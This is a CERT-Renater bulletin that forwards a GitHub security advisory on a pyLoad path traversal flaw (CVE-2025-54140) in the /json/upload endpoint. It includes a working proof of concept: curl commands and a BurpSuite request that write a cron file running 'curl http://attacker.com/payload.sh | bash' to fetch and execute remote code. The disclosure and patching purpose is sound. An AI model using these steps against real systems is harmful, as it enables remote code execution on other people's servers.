Ce mail provient de l'extérieur, restons vigilants

=====================================================================

                            CERT-Renater

                Note d'Information No. 2025/VULN462
_____________________________________________________________________

DATE                : 22/07/2025

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running pyload-ng versions prior to
                                   0.5.0b3.dev90.

=====================================================================
https://github.com/pyload/pyload/security/advisories/GHSA-xqpg-92fq-grfg
_____________________________________________________________________


Path Traversal in `json/upload` Endpoint allows Arbitrary File Write
in `pyLoad`
High
GammaC0de published GHSA-xqpg-92fq-grfg Jul 21, 2025

Package
pyload-ng (pip)

Affected versions
0.5.0b3.dev89

Patched versions
0.5.0b3.dev90


Description

Summary

An authenticated path traversal vulnerability exists in the /json/upload
endpoint of the pyLoad By manipulating the filename of an uploaded file,
an attacker can traverse out of the intended upload directory, allowing
them to write arbitrary files to any location on the system accessible
to the pyLoad process. This may lead to:

    Remote Code Execution (RCE)
    Local Privilege Escalation
    System-wide compromise
    Persistence and backdoors


Vulnerable Code

File: src/pyload/webui/app/blueprints/json_blueprint.py

@json_blueprint.route("/upload", methods=["POST"])
def upload():
    dir_path = api.get_config_value("general", "storage_folder")
    for file in request.files.getlist("file"):
        file_path = os.path.join(dir_path, "tmp_" + file.filename)  
        file.save(file_path) 

Issue: No sanitization or validation on file.filename, allowing traversal
via ../../ sequences.


(Proof of Concept)

    Clone and install pyLoad from source (pip install pyload-ng):

git clone https://github.com/pyload/pyload
cd pyload
git checkout 0.4.20
python -m pip install -e .
pyload --userdir=/tmp/pyload

    Or install via pip (PyPi) in virtualenv:

python -m venv pyload-env
source pyload-env/bin/activate
pip install pyload==0.4.20
pyload

    Login and obtain session token

curl -c cookies.txt -X POST http://127.0.0.1:8000/login \
  -d "username=admin&password=admin"

    Create malicious cron payload

echo "*/1 * * * * root curl http://attacker.com/payload.sh | bash" > exploit

    Upload file with path traversal filename

curl -b cookies.txt -X POST http://127.0.0.1:8000/json/upload \
  -F "file=@exploit;filename=../../../../etc/cron.d/pyload_backdoor"

    On the next cron tick, a reverse shell or payload will be triggered.


BurpSuite HTTP Request

POST /json/upload HTTP/1.1
Host: 127.0.0.1:8000
Cookie: session=SESSION_ID_HERE
Content-Type: multipart/form-data; boundary=------------------------d74496d66958873e

--------------------------d74496d66958873e
Content-Disposition: form-data; name="file"; filename="../../../../etc/cron.d/pyload_backdoor"
Content-Type: application/octet-stream

*/1 * * * * root curl http://attacker.com/payload.sh | bash
--------------------------d74496d66958873e--


References

    fc4b136

Severity
High
7.5/ 10

CVSS v3 base metrics
Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
High
Availability
None
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CVE ID
CVE-2025-54140

Weaknesses
Weakness CWE-22

Credits

    @odaysec odaysec Reporter



=========================================================
+ CERT-RENATER        |    tel : 01-53-94-20-44         +
+ 23/25 Rue Daviel    |    fax : 01-53-94-20-41         +
+ 75013 Paris         |   email:cert@support.renater.fr +
=========================================================